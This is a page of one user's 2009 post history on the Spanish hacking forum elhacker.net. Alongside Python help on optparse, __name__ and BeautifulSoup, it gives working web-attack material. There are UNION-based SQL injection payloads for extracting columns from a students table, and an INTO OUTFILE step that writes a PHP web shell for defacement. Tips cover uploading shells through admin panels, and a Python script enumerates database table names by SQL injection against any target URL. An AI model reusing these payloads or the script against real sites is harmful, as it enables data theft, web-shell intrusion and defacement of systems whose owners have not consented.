elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15
131  Foros Generales / Sugerencias y dudas sobre el Foro / Re: xss en el hacker.net en: 9 Diciembre 2009, 01:35 am
Primero quiero pedirles perdon a toda su comunidad por mocos q me heche cuando era mas pendejo, fui borrado de la db.espero tener otra oportunidad en esta comunidad.


Gente como veran no pertenesco a esta comunidad por lo que no conozco quien es el admin de este sitio

 :rolleyes:
132  Seguridad Informática / Nivel Web / Re: duda sql injection en: 27 Septiembre 2009, 23:20 pm
Código:
-1+union+select+1,2,3,4,nombrecolumna,6,7,8,9,10,11,12+from+alumnos+limit+0,1--
si queres saber el valor de varias a la vez las concatenas...
Código:
-1+union+select+1,2,3,4,concat_ws(0x3a,nomnbrecolumna,otronombrecolumna,etc),6,7,8,9,10,11,12+from+alumnos+limit+0,1--

133  Informática / Software / Re: Cursos "Guias "Libros Y Manuales De Todo Tipo En Descarga Directa Aqui!!!! en: 23 Septiembre 2009, 03:32 am
Jaja es chiste no¿?
Como se supone que el que no sabe descargar de rapidshare se pueda bajar el manual si lo subiste a rapidshare xD
134  Seguridad Informática / Nivel Web / Re: sql injection y luego deface en: 13 Septiembre 2009, 02:33 am
podes probar hacer en la inyeccion un INTO + OUTFILE ... ejemplo: ->
UNION SELECT "codigo malicioso" INTO OUTFILE "PATH/shell.php"
para esto debes procurar que las magic_quotes no este habilitada asi no tienes problemas con las comillas ....

mmm considerando que es siempre para http? o sea siempre accediendo desde el puerto 80? leí algo sobre subir una shell puede ser? donde podría encontrar más info sobre esto? o si me pueden ayudar por acá mejor, lo que encontré pasa muy por arriba esta parte, la mayoría se centra en las inyecciones
lo que vos decis es sacar la contraseña y usuario de un panel de administracion?
en ese caso te logueas y buscas un upload de imagenes o de lo que sea y uploadeas la shell haciendo un bypass si es necesario ....
tengo una duda...
no hai que ser root para poder crear una shell ?
nunca me salio eso xD


http://milw0rm.com/video/watch.php?id=88

saludos
No necesariamente lo que si tenes que contar con permisos de lectura y escritura en la carpeta donde vas a escribir y ademas el usuario debe tener el privilegio FILE... despues de eso ya lo podes hacer tambien tenes que sacar el documentroot pero eso es facil con poner con pasarle una ' en donde estas inyectando te deberia mostrar todo el path ... (en la mayoria de los casos xD)
es dificil encontrar un server con dicha configuracion de mysql y php.....
135  Seguridad Informática / Nivel Web / Re: sql injection y luego deface en: 13 Septiembre 2009, 00:21 am
podes probar hacer en la inyeccion un INTO + OUTFILE ... ejemplo: ->
UNION SELECT "codigo malicioso" INTO OUTFILE "PATH/shell.php"
para esto debes procurar que las magic_quotes no este habilitada asi no tienes problemas con las comillas ....

mmm considerando que es siempre para http? o sea siempre accediendo desde el puerto 80? leí algo sobre subir una shell puede ser? donde podría encontrar más info sobre esto? o si me pueden ayudar por acá mejor, lo que encontré pasa muy por arriba esta parte, la mayoría se centra en las inyecciones
lo que vos decis es sacar la contraseña y usuario de un panel de administracion?
en ese caso te logueas y buscas un upload de imagenes o de lo que sea y uploadeas la shell haciendo un bypass si es necesario ....
136  Programación / Scripting / Re: Distribuir mi programa en: 7 Septiembre 2009, 02:33 am
Si usa Windows que se descargue el interprete o vos podes usar por ejemplo py2exe y lo convertis en un ejecutable para que pueda ejecutarlo sin tener el interprete instalado....
Si usa GNU/Linux (la mayoria de las distribuciones lo traen instalado) pasale el codigo que lo ponga cree un archivo .py pegue el codigo y lo ejecute ... ~$ python programa.py
xD no entiendo como andas programando en python y preguntes eso  :P
137  Programación / Scripting / Re: [Python] optparse en: 18 Agosto 2009, 21:41 pm
No, optparse de por si trata todos los argumentos como opcionales no puedes poner que tal parametro sea obligatorio y tales otros no... todos son opcionales... por ahi eh visto que tocando un poco el code de una clase de ese modulo podias ponerle vos esa opcion, pero ya de por si optparse no te brinda soporte para lo que quieres.
Igualmente tenes dentro del standar a getopt que me parece que si lo podes hacer en la documentacion oficial hay documentacion acerca de el...

Saludos
138  Programación / Scripting / Re: Python, que es __name__ == "__main__"? en: 16 Agosto 2009, 08:05 am
Código:
if __name__ == "__main__"
Esa comparacion es como si el modulo(donde este escrita) diga:
Si no eh sido importado hacer lo siguiente...

Yo diria que se deberia usar cuando haces un script que puede ser importado o no y se ejecute por si mismo....
por ejemplo imaginate que tienes un script con varias funciones y quieres que tu script pueda ser importado y las funciones puedan ser manejadas por otro modulo y quieres que tambien que si lo ejecutas directamente ejecute tal y tal funcion....
entonces pones el condicional.....
if __name__ == "__main__": #si me ejecuto directamente
      funcion1(arg1, arg2) #ejecutar funcion1
      funcion2()
      .....

si hicieras el programa para que solo se ejecute directamente y no sea necesario utilizarlo como modulo de importacion no es necesario usarlo ya que directamente para ejecutar tus propias funciones y usar tus propias clases dentro de tu script las llamas desde ahi, por ejemplo tienes
Código:
def sumar(num1, num2):
    return num1 + num2

def restar(num1, num2):
    return num1 - num2

resultado = sumar(5, 7) #estas ejecutando las funciones del modulo directamente
si este modulo es importado el interprete ejecutaria esa la sentencia "resultado = sumar(5, 7)" en el modulo que lo importo sin preguntarle si quiera al que lo importo si queria llamar a esa funcion....
entonces seria conveniente ponerle ese if ahi .... osea:
Código:
def sumar(num1, num2):
    return num1 + num2

def restar(num1, num2):
    return num1 - num2
 
if __name__ == '__main__': #si nos estamos ejecutando solos
    resultado = sumar(5, 7) #realizar mi suma

si el modulo es importado el valor del modulo deja de ser __main__ y pasa a ser el nombre del modulo por lo que si es importado la condicion no se cumple y por lo tanto no se ejecuta nuestra llamada a la funcion..

pd: tal vez no se note tanto el uso en el ejemplo de m... ese q puse pero creeme que es muy util ...

Saludos !
139  Programación / Scripting / Re: python y tabla HTML en: 16 Agosto 2009, 07:22 am
Un muy buen parser de html para python es BeautifulSoup para lo que pides es mas que suficiente  :)
140  Seguridad Informática / Nivel Web / Re: (DUDA) Haciendo SQL Injection. en: 30 Julio 2009, 02:10 am
bueno basicamente seria algo asi.... esta en python
Código
  1. import urllib2
  2.  
  3. url = raw_input("Introduce la url + el path vulnerable\n\tejemplo: www.ejemplo.com/xxxx.php?id=\n")
  4.  
  5. tablas = ['admin','tblUsers', 'tbl_users', 'tbl_admin',,'tblAdmin','user','users','username','usernames','usuario',
  6. 'name','names','nombre','nombres','usuarios','member','members','admin_table',
  7. 'miembro','miembros','membername','admins','administrator',
  8. 'administrators','passwd','password','passwords','pass','Pass',
  9. 'user_password', 'usua_login','user_passwords','user_name','user_names',
  10. 'member_password','mods','mod','moderators','moderator','user_email',
  11. 'user_emails','user_mail','user_mails','mail','emails','email','address',
  12. 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
  13. 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  14. 'u_password','nick','nicks','manager','managers','administrador',
  15. 'administradores','clave','login_id','pwd','pas','sistema_id',
  16. 'sistema_usuario','sistema_password','contraseña','auth','key','senha',
  17. 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
  18. 'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors',
  19. 'accounts','account','accnts','accnt','customers','customer','membres','administrateur','utilisateur','utilisateurs',
  20. 'password','passwords','amministratore','god','God','authors','autores','membername','usuario','Users','Admin','Members',
  21. 'Miemberos','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER', 'username', 'user_hash']
  22.  
  23. inyeccion = "-11+union+select+1,2,3,4,5,6,7+from+"
  24.  
  25. for tabla in tablas:
  26. web = urllib2.urlopen(url + inyeccion + tabla)
  27. source = web.read()
  28. error = "Table 'emotiu." + str(tabla) + "' doesn't exist"
  29. if not error in source:
  30. print "Tabla %s se encuentra en la base de datos" % tabla
  31.  
  32. print "Fin xd"
  33.  
  34.  

Por cierto la lista de tablas esa no es mia la saque de otro script que vi por ahi ....
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 [14] 15
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines